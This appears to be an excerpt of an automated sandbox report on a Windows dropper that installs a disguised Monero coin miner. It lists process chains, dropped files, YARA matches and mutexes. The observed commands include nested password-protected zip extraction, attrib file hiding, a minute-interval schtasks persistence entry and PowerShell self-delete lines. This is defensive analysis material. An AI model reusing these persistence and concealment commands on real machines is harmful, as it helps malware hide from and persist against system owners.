Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_003A779B 2_2_003A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0036E530 6_2_0036E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00386192 6_2_00386192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003A8860 6_2_003A8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00364B30 6_2_00364B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003A2D10 6_2_003A2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00364DE0 6_2_00364DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00380E13 6_2_00380E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003A7049 6_2_003A7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003A31A8 6_2_003A31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00381602 6_2_00381602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003A779B 6_2_003A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003A78BB 6_2_003A78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00383DF1 6_2_00383DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00397F36 6_2_00397F36
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140377A 7_3_0140377A
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140377A 7_3_0140377A
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140377A 7_3_0140377A
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140377A 7_3_0140377A
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_013F5AF1 7_3_013F5AF1
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files\Windows Media Player\graph\graph.exe D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe 10BFF40A9D960D0BE3CC81B074A748764D7871208F324DE26D365B1F8EA3935A
Enables security privileges
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Process token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00DB80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 003780C0 appears 391 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00377A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0037D64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0037D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0037D942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0037DF80 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00398E10 appears 47 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000030.00000003.2926529139.00000131C27B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 00000030.00000003.2926529139.00000131C27B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: random[1].exe.6.dr Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
Source: 0516ff61af.exe.6.dr Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: 0516ff61af.exe.6.dr Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
Source: random[2].exe.6.dr Static PE information: Section: jxwvjkbl ZLIB complexity 0.9945648850293543
Source: 1b73492cb0.exe.6.dr Static PE information: Section: jxwvjkbl ZLIB complexity 0.9945648850293543
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@79/56@12/12
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File created: C:\Program Files\Google\Chrome\Extensions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Mutant created: \Sessions\1\BaseNamedObjects\48cb35e3030a2b429c6ac414faba9b49
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe Mutant created: \Sessions\1\BaseNamedObjects\FloppyShip
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 0516ff61af.exe, 00000007.00000003.2525534739.0000000005DE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 54%
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh&
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe "C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe "C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe"
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe "C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe "C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe"
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe "C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe"
Source: unknown Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe "C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe "C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe "C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe "C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe "C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe "C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe "C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
